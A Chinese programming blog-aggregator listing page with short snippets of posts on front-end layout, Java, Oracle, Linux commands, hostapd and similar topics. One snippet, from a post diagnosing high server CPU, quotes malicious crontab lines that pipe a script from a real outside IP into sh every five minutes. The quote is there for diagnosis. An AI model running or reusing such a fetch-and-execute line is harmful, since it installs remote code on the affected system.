//让content向上滚动 软键盘的高度@ViewChild(Content) content: Content; scrollTo(){ window.addEventListener('native.keyboardshow',(e:any) =>{ this.content.scrollTo ...
分类:
其他好文 时间:
2017-12-15 12:35:16
阅读次数:
434
圣杯布局 特点: 1、按照中间部分、左部分、右部分的顺序排列; 2、容器的子元素都是浮动布局 float: left; 3、容器设置padding为两侧腾出空间; 4、中间部分宽度为100%; 5、两侧都是相对定位,左部分margin: -100%, left: 负自身宽度, 右部分margin: ...
分类:
其他好文 时间:
2017-12-15 12:35:06
阅读次数:
153
Java代码 1.System.out.println(new java.util.Date()); 输出:Thu Jan 27 14:43:28 CST 20112.System.out.println(new java.util.Date().toLocaleString()); 输出:2011 ...
分类:
编程语言 时间:
2017-12-15 12:34:59
阅读次数:
400
1.安装命令“ cnpm install --save isomorphic-fetch es6-promise 2.由于ie不支持Promise,所以需要安装promise-polyfill; cnpm install promise-polyfill --save-exact 需要在index. ...
分类:
其他好文 时间:
2017-12-15 12:34:50
阅读次数:
232
一数据库版本 SYS@LEO1>select* from v$version; BANNER Oracle Database 11g Enterprise EditionRelease 11.2.0.1.0 - 64bit Production PL/SQLRelease 11.2.0.1.0 - ...
分类:
数据库 时间:
2017-12-15 12:34:38
阅读次数:
148
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh 发现服务器CPU占用率超100,先不要着急删除文件,确定文件 ...
分类:
其他好文 时间:
2017-12-15 12:34:29
阅读次数:
168
$.ajax 是 jQuery 底层 AJAX 实现,$.ajax是一种通用的底层封装,$.ajax()请求数据之后,则需要使用回调函数,有beforeSend、error、dataFilter、success、complete等。$.get $.post是简单易用的高层实现,我们使用$.get $ ...
分类:
Web程序 时间:
2017-12-15 12:34:22
阅读次数:
155
1 导入jar包 2 导入log4j.properties文件 3 jdbc.properties 4 因为是否需要hibernate.cfg.xml文件,所以Spring和Hibernate整合的方式有两种 5 项目地址 ...
分类:
编程语言 时间:
2017-12-15 12:34:13
阅读次数:
165
个人中心—视图函数带标签页面参数tag@app.route('/usercenter//')def usercenter(user_id, tag): if tag == ‘1': return render_template('usercenter1.html', **context) 个人中心—... ...
分类:
其他好文 时间:
2017-12-15 12:34:03
阅读次数:
119
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/P ...
分类:
其他好文 时间:
2017-12-15 12:33:56
阅读次数:
95
由于在Windows下换行是\n\r,在Linux下打开多了\r,所以需要删除。删除命令 :sed -i 's/\r$//' filename 参考: bash: ./t.sh:/bin/bash^M:损坏的解释器: 没有那个文件或目录 Error处理:/bin/bash^M: 坏的解释器: 没有该 ...
分类:
其他好文 时间:
2017-12-15 12:33:47
阅读次数:
125
一数据库版本 SYS@LEO1>select * from v$version; BANNER Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production PL/SQL Release 11.2.0.1.0 ...
分类:
数据库 时间:
2017-12-15 12:33:38
阅读次数:
169
1. 安装NetworkManager管理工具(可选),以支持nmcli命令 2. 安装hostapd和dhcpd 开机不需要启动这两个服务,建议把它们关掉: 3. 配置hostapd和dhcpd 注意自己设置其中的无线热点名称ssid和认证密码wpa_passphrase. 设置dhcpd.con ...
分类:
其他好文 时间:
2017-12-15 12:33:30
阅读次数:
225
查看用户组cat /etc/group 查看用户列表cat /etc/passwd设置目录export PATH=/mnt/c/Develop/mongodb:$PATH删除文件夹实例:rm -rf /var/log/httpd/access将会删除/var/log/httpd/access目录以及... ...
分类:
系统相关 时间:
2017-12-15 12:33:21
阅读次数:
167
比特币白皮书:http://www.8btc.com/wiki/bitcoin-a-peer-to-peer-electronic-cash-system以太坊白皮书: https://github.com/ethereum/wiki/wiki/%5B%E4%B8%AD%E6%96%87%5D-%E... ...
分类:
其他好文 时间:
2017-12-15 12:33:12
阅读次数:
129
今天,我将做一个算术运算符++和--的笔记以及一元运算符和二元运算符同时存在怎么计算的笔记 ++;分为前加加和后加加,但是最后结果都是+1; --;分为前减减和后减减,但是最后结果都是-1; 例如: int num = 10; num++; Console.WriteLine(num); Conso ...